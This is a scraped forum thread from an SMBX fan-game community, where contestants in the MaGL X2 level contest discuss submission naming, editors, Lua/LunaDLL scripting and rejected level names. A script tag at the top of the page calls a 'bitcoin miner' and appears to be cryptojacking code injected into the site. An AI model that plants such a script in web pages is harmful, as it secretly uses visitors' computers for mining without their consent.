<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralpge project

MaGL X2 Discussion - MaGL X2 Lands TOMORROW. GET. HYPE.

User avatar
Sniggerb0bble
These arms ain't ever going down.
Posts: 210
Joined: 10 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Sniggerb0bble » 4 years ago

Quick submission question: In the submission rules we're meant to name our levels "Username-Levelname.lvl" -> Are we meant to use the entire level name, or can we used a short abridged version?

(Apologies if this has been asked elsewhere)

User avatar
Rednaxela
Maker of Shenanigans
Posts: 785
Joined: 6 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Rednaxela » 4 years ago

FluffiMasta wrote:What is the default gravity?
12. Note that it's in "resetdefines.txt" in order to reset that value upon exiting levels.

User avatar
Nathan the Talkmaus
Unofficial Talkhaus Mascot
Posts: 485
Joined: 6 years ago
Location: Michigan

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Nathan the Talkmaus » 4 years ago

Dragon Fogel wrote: This devkit, linked in the first post of the signup thread.
I'm not downloading a new program to spend part of an afternoon working on one level based on the new program having a reputation for a more user-friendly interface. Partly because every time I've been told some utility is more user-friendly than another (newer version of Windows over an older one, GIMP over MSPaint, OpenOffice over WordPad) it's either unfriendly or both unfriendly and devours my scant system resources.
Image
Winner of the Horikawa Blessing 2015

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2520
Joined: 9 years ago
Location: Finland

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Willhart » 4 years ago

You should be able to find a way to disable multiple instances for the codec by googling. Does right clicking one of the icons on the bottom right give you access to the FFDShow control panel?

User avatar
The Destroyer of Worlds
I am become death
Posts: 1487
Joined: 7 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby The Destroyer of Worlds » 4 years ago

Sniggerb0bble wrote:Quick submission question: In the submission rules we're meant to name our levels "Username-Levelname.lvl" -> Are we meant to use the entire level name, or can we used a short abridged version?

(Apologies if this has been asked elsewhere)
Feel free to abreev
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

User avatar
Kerkec
Posts: 25
Joined: 8 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Kerkec » 4 years ago

Sniggerb0bble wrote:Quick submission question: In the submission rules we're meant to name our levels "Username-Levelname.lvl" -> Are we meant to use the entire level name, or can we used a short abridged version?

(Apologies if this has been asked elsewhere)
I ended up shortening my .lvl file's name to just my username, the dash, and two letters, so it's probably alright to make it as short as you need in order to not break your level, as longer names tend to cause issues

I was told to make it as short as I needed to, so as long as you have username-SOMETHING, it'll probably be acceptable, since you can just mention the full level name in your submission pm

though if that's wrong and I was just being made an exception to this, then I don't know

EDIT: never mind, the magl queen herself answered your question before me

User avatar
Isocitration
Posts: 34
Joined: 9 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Isocitration » 4 years ago

Rednaxela wrote:You should be able to do that actually:
Take a look at npcconfig.lua by Hoeloe (file)

Grabbability is something that's per NPC-type rather than per individual NPC. The per NPC-type parameters aren't particularly well documented currently outside of npcconfig.lua existing. To do it without npcconfig.lua dependency if you prefer is just a couple lines too, and would look like:

Code: Select all

local PTR_NPC_GRABSIDE = mem(0x00B25E2C, FIELD_DWORD)
mem(PTR_NPC_GRABSIDE + npcid * 2, FIELD_WORD, -1)
Where -1 is true and 0 would be false, and npcid is the type of NPC you want to switch it for.
And with that, my npc now appears to be behaving as intended. Thanks a bunch!

User avatar
Dragon Fogel
Master of Pointlessness
Posts: 1080
Joined: 5 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Dragon Fogel » 4 years ago

Nathan the Talkmaus wrote:
Dragon Fogel wrote: This devkit, linked in the first post of the signup thread.
I'm not downloading a new program to spend part of an afternoon working on one level based on the new program having a reputation for a more user-friendly interface. Partly because every time I've been told some utility is more user-friendly than another (newer version of Windows over an older one, GIMP over MSPaint, OpenOffice over WordPad) it's either unfriendly or both unfriendly and devours my scant system resources.
Let me be a little more specific.

You can't copy-paste or undo in the default editor. You can in this one. Aside from that there are a lot of little conveniences, but those two points are the big ones. (However, you do still need regular SMBX to test levels, at least for now.)

Even if you don't want to use it, there's still the fact that there's a version of SMBX that apparently already has the SDL stuff that I don't understand any better than you do taken care of, and that's included in the download.
Image
Click that banner if you like reading words.
Image
Make levels from unused MAGL X names!

User avatar
Aqualakitu
Posts: 23
Joined: 10 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Aqualakitu » 4 years ago

Phew, finally got around to submitting my level. If the submissions are as good as last year's, it's going to be quite a ride.
And now, some unused level names.

Garrulous Young Outsider
So. How Do You Feel About Willful Dark Pokey?
So. How Do You Feel About Voracious Magikoopa?
Back in My Day They Waited in the Mushroom Kingdom


I was pretty tempted by the last one but the implications for the gimmicks I could've done seemed quite boring. And the others weren't very exciting. But the one I chose was of course.

User avatar
Jasaya
Posts: 6
Joined: 5 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Jasaya » 4 years ago

Oh boy, my level is finally done!
It's the first level I've created, ever. And uhm.. yeah what can I say, it's probably not going to be very good, but I hope it's at least something special ^^'

Oh, and for the curious peeps, here are my unused level names:
Well Shucks, I Never Expected Larry Koopa to Be So Tenuous
So. How Do You Feel About Ugly Pidgits?
I Believe That Heavy Troopa Are Fanatical and I Feel Very Strongly About This!
Hey Buddy! Get Your Fuzzy Off My Skies
Now the waiting game begins. Can't wait to see all levels in action!
...

GalaxyOfJ
The Mysterious Stranger Except Incompetent
Posts: 82
Joined: 6 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby GalaxyOfJ » 4 years ago

Horikawa Otane wrote:
Sniggerb0bble wrote:Quick submission question: In the submission rules we're meant to name our levels "Username-Levelname.lvl" -> Are we meant to use the entire level name, or can we used a short abridged version?

(Apologies if this has been asked elsewhere)
Feel free to abreev
Welp, have fun with my filename

User avatar
Sniggerb0bble
These arms ain't ever going down.
Posts: 210
Joined: 10 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Sniggerb0bble » 4 years ago

Okay, just sent my level, and so before I go into a mental breakdown wherein I believe everything I've made is broken, here are my rejected level names:
My Dad Said That Demo Was of the Devil. I'm Inclined to Agree.
Fat Guys Are Supposed to Be Juvenile! Why Are You Being So Economic?!?
I've Got a Rad Feeling About This
Actually, It's About Blarggs in Tame Castles
The second one in there really intrigued me, but ultimately I couldn't think of many good mechanical ideas for it.

The one I did choose however... It's a thing.

(Also thanks to Horikawa and Kerkec for the info)

User avatar
Oh Man
Where is my water buffalo? Why don't I have a water buffalo?
Posts: 78
Joined: 4 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Oh Man » 4 years ago

I finished and submitted my level last night, but here's rejected level names anyway:
Wow! Podoboos are Cheating Magikoopa!
Sub Zero and Ice Climbers Meet at Last
Ewww! the Birdo Are All Covered in Art!!!!
So. How Do You Feel About Flowery Swoopers?
I had some vague ideas for jokes for the last two but I had no idea what to do with them gameplays wise (the name I went with is still an arguably tenuous connection to the level). Couldn't think of anything for the first two.
Image

User avatar
Alice
Posts: 2215
Joined: 8 years ago
Pronouns: Girl person
Location: Wonderland

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Alice » 4 years ago

Arctangent wrote:Man, the PGE Editor really is so much better than the standard SMBX one, but it's certainly tiring hopping from it to the SMBX editor to test changes.
Unfortunately it's probably going to be quite awhile before Wohlstand's version of the engine itself is in a state it can be used reasonably for level testing.

User avatar
Garlyle
Posts: 163
Joined: 10 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Garlyle » 4 years ago

Ignoritus wrote:

I see Bread People

Sniggerb0bble wrote:

I've Got a Rad Feeling About This

I'm losing it over here oh my god these level names are amazing and I'm kinda sad we won't see them
Horikawa Otane wrote:MaGL X2 is officially larger than MaGL X.
wait, like, in terms of people who signed up or what?

User avatar
Lejes
Posts: 76
Joined: 6 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Lejes » 4 years ago

Is it possible to have platforms rising from a pit à la SMB1? I tried putting a generator for iron platforms, but it doesn't function outside the level bounds. So the platforms are just kind of appearing out of thin air now. They also get out of sync easily if I try to put more than one.

McKnackus
Nobody ex-CAWCAW
Posts: 56
Joined: 5 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby McKnackus » 4 years ago

I'm trying to make a midpoint that spawns you in a different area using Lunadll and, well, I don't understand the instructions.

It says to place an axe and then says to make a layer to hide it. So is that axe supposed to be on a layer that will be hidden using an event or is the axe supposed to be on the default layer and somehow an additional layer will hide it? So far as I know the only way to hide items is by having them on a seperate layer.

Also, I can't find the Lunadll.lua file anywhere in the Luna devkit provided in the MAGL X2 thread. Is Lunadll an application or just a file I'm supposed to open with notepad? And what's it called in the devkit?

Those are my questions thus far. The rest seems to make sense assuming I can get it to work at all.

User avatar
Hoeloe
A2XT person
Posts: 919
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Hoeloe » 4 years ago

McKnackus wrote:I'm trying to make a midpoint that spawns you in a different area using Lunadll and, well, I don't understand the instructions.

It says to place an axe and then says to make a layer to hide it. So is that axe supposed to be on a layer that will be hidden using an event or is the axe supposed to be on the default layer and somehow an additional layer will hide it? So far as I know the only way to hide items is by having them on a seperate layer.

Also, I can't find the Lunadll.lua file anywhere in the Luna devkit provided in the MAGL X2 thread. Is Lunadll an application or just a file I'm supposed to open with notepad? And what's it called in the devkit?

Those are my questions thus far. The rest seems to make sense assuming I can get it to work at all.
Lunadll.lua is a file you create in your level folder to contain your code. You may want to take a look at some of the beginner tutorials on the wiki, as they explain some of this. You can create a lunadll.lua file with notepad, but I recommend using Notepad++, as it's a lot nicer for writing code in.

The axe NPC is supposed to be on a separate layer that will be hidden with an event.
Image
Image
Image
Image
Image

McKnackus
Nobody ex-CAWCAW
Posts: 56
Joined: 5 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby McKnackus » 4 years ago

Hoeloe wrote:
McKnackus wrote:I'm trying to make a midpoint that spawns you in a different area using Lunadll and, well, I don't understand the instructions.

It says to place an axe and then says to make a layer to hide it. So is that axe supposed to be on a layer that will be hidden using an event or is the axe supposed to be on the default layer and somehow an additional layer will hide it? So far as I know the only way to hide items is by having them on a seperate layer.

Also, I can't find the Lunadll.lua file anywhere in the Luna devkit provided in the MAGL X2 thread. Is Lunadll an application or just a file I'm supposed to open with notepad? And what's it called in the devkit?

Those are my questions thus far. The rest seems to make sense assuming I can get it to work at all.
Lunadll.lua is a file you create in your level folder to contain your code. You may want to take a look at some of the beginner tutorials on the wiki, as they explain some of this. You can create a lunadll.lua file with notepad, but I recommend using Notepad++, as it's a lot nicer for writing code in.

The axe NPC is supposed to be on a separate layer that will be hidden with an event.
oh ok. Thanks!

User avatar
Hoeloe
A2XT person
Posts: 919
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Hoeloe » 4 years ago

McKnackus wrote: oh ok. Thanks!
The library comes with an example level, which you should be able to use to check you're setting things up properly.
Image
Image
Image
Image
Image

Zygl
Posts: 550
Joined: 7 years ago
Contact:

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Zygl » 4 years ago

So I've got a rather significant problem.
My entire level (so far, anyway) is in one section, making extensive use of events to change the section boundaries so it only scrolls in one direction (vertically or horizontally) at a time.
But I also wanted to put in a midpoint, and I couldn't figure out how to set the section boundaries to where the midpoint is before it loaded the level and decided to scroll over there really slowly for like 45 seconds. So I copied the entire level to section 2 and changed the starting boundaries in section 1 to where the midpoint is. After a bunch more tinkering with lunadll.txt and copying most of my events, the midpoint and all the screen boundary setting events seem to work fine.
The problem is that in section 2 any despawnable enemies that are off the side of the screen when the dimensions change just kinda don't spawn at all. This does not happen in section 1 (after restarting from the midpoint), and I've triple-checked that the enemies are there in the editor and the layer they're on is hidden by default and shown when it needs to be.
Also I'm not sure if it's related but the events that are set to show them make the 'shell kicked/thing burned/whatever' sound despite very explicitly being set not to make a sound at all. And this is the case in both sections.
ImageImage
ImageImage
ImageImage
ImageImage

User avatar
Diggertron
Posts: 35
Joined: 6 years ago
Location: The United Kingdom of Great Britain and Northern Ireland

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Diggertron » 4 years ago

Note to self: Don't start trying to make a boss fight on the last evening you have to work on your level.

Hoping that I can get points based on a joke I made in my level



Edit while posting: Also fuck me that level editor that came with the devkit has just ruined all of my events.

Whatever.


EditEdit: By ruined all my events, I mean that every single npc has the same event set to activate for every parameter. What.
That makes raocow a victim of proprietary software.
Skynet.

McKnackus
Nobody ex-CAWCAW
Posts: 56
Joined: 5 years ago

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby McKnackus » 4 years ago

Hoeloe wrote:
McKnackus wrote: oh ok. Thanks!
The library comes with an example level, which you should be able to use to check you're setting things up properly.
Eugh, I can't figure it out honestly, and I don't have the time to do so, so I'm just gonna use a regular midpoint. It'll sacrifice the effect I was going for with the music, but I guess the level still works without it.

User avatar
Hoeloe
A2XT person
Posts: 919
Joined: 8 years ago
Pronouns: she/her
Location: Spaaace

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Hoeloe » 4 years ago

McKnackus wrote:
Hoeloe wrote:
McKnackus wrote: oh ok. Thanks!
The library comes with an example level, which you should be able to use to check you're setting things up properly.
Eugh, I can't figure it out honestly, and I don't have the time to do so, so I'm just gonna use a regular midpoint. It'll sacrifice the effect I was going for with the music, but I guess the level still works without it.
That's a shame. It's not too difficult to do once you've got the Lua file in place. It's just 2 events per midpoint (one to hide the midpoint when you spawn on it, and one to trigger the Lua code), and a line of Lua.

If you wanted to send me the file or something, I could try setting it up for you.
Image
Image
Image
Image
Image

Zygl
Posts: 550
Joined: 7 years ago
Contact:

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Zygl » 4 years ago

Zyglrox Odyssey wrote:So I've got a rather significant problem.
My entire level (so far, anyway) is in one section, making extensive use of events to change the section boundaries so it only scrolls in one direction (vertically or horizontally) at a time.
But I also wanted to put in a midpoint, and I couldn't figure out how to set the section boundaries to where the midpoint is before it loaded the level and decided to scroll over there really slowly for like 45 seconds. So I copied the entire level to section 2 and changed the starting boundaries in section 1 to where the midpoint is. After a bunch more tinkering with lunadll.txt and copying most of my events, the midpoint and all the screen boundary setting events seem to work fine.
The problem is that in section 2 any despawnable enemies that are off the side of the screen when the dimensions change just kinda don't spawn at all. This does not happen in section 1 (after restarting from the midpoint), and I've triple-checked that the enemies are there in the editor and the layer they're on is hidden by default and shown when it needs to be.
Also I'm not sure if it's related but the events that are set to show them make the 'shell kicked/thing burned/whatever' sound despite very explicitly being set not to make a sound at all. And this is the case in both sections.
Update on the latter issue: For some reason it happens because of one of the layers the events are showing. Even if there's literally nothing on the layer, even if the layer's already showing. If the event is set to show the layer, it blatantly ignores my setting it to not make a noise and makes a noise anyway.

e: Upon zooming out far enough that I can see section 4 from section 1 and selecting absolutely everything on the layer and deleting it, the noise stopped. But I have no idea what I deleted that did that, considering I didn't see anything that I didn't delete the first time.
ImageImage
ImageImage
ImageImage
ImageImage


Return to “archive”

Who is online

Users browsing this forum: No registered users and 3 guests